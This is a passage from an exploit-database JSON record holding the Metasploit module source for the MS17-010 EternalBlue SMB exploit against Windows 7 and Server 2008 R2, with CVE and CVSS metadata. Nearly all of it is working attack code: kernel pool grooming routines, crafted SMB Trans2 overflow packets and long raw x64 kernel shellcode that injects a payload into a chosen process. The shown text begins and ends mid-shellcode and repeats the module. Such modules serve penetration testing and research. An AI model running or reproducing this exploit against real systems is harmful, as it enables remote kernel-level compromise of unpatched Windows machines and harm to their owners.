\"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet, tree_id, user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the domain. If the user has not supplied a domain\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the domain value\n def smb_domain\n if datastore['SMBDomain'].present?\n datastore['SMBDomain']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 2797}, "differentElements": ["sourceData"], "edition": 57, "lastseen": "2018-11-24T14:34:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-06-04T19:48:49", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2018-04-25T08:57:12", "objectVersion": "1.4", "published": "2017-05-24T21:09:51", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ),\n OptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ),\n OptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ),\n OptBool.new( 'VerifyTarget', [ true, \"Check if remote OS matches exploit Target.\", true ] ),\n OptBool.new( 'VerifyArch', [ true, \"Check if remote architecture matches exploit Target.\", true ] ),\n OptString.new('SMBUser', [ false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [ false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),\n ])\n end\n\n class EternalBlueError < StandardError\n end\n\n def check\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n end\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning(\"The DCE/RPC service or probe may be blocked\") if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n 